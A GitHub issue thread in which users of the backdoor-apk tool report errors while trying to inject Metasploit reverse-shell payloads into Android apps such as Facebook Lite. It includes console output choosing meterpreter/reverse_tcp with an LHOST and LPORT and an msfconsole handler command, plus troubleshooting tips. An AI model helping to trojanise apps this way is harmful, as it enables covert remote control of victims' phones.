### ISSUE TITLE
when using backdoor-apk to backdoor facebook_lite.apk a error comes saying

### ISSUE THREAD

**Issue by RFHACKE** [dana-at-cp/backdoor-apk#156]
when using backdoor-apk to backdoor facebook_lite.apk a error comes saying:failed to locate smali file to hook

**Comment by RFHACKE** [comment]
failed to locate smali file to hook

**Comment by RFHACKE** [comment]
please replay fast

**Comment by empt1xo** [comment]
same issue as https://github.com/dana-at-cp/backdoor-apk/issues/75

**Comment by dana-at-cp** [comment]
@RFHACKE Did the APK originate from the Google Play Store?

**Comment by almasvhora77** [comment]
same issue with me
failed to find smali to hook

**Comment by RFHACKE** [comment]
no it did not originate from play store

**Comment by RFHACKE** [comment]
wait.it is not only giving this error with facebook lite etc apk.it is giving this error with all the apks.please fix this fast

**Comment by RFHACKE** [comment]
________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Thu Oct 18 12:08:42 EDT 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.0.26
[?] Please enter an LPORT value: 5555
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[!] Failed to decompile original APK file

wow!another error also appears

**Comment by RFHACKE** [comment]
replay fast.i request you to fix these error.please fix them

**Comment by dana-at-cp** [comment]
@RFHACKE @empt1xo @almasvhora77 Have you tried the APK files included in the third-party/APKs folder?

**Comment by empt1xo** [comment]
@dana-at-cp yeah i still get the same error.

**Comment by dana-at-cp** [comment]
@empt1xo That is very strange and doesn't make much sense. Can you share the relevant run.log file?

**Comment by wmxuan666** [comment]
It may be a problem with /. When I put the apk file in the directory specified by the current terminal, this kind of error will not occur

For example: ./backdoor-apk.sh XXX.apk
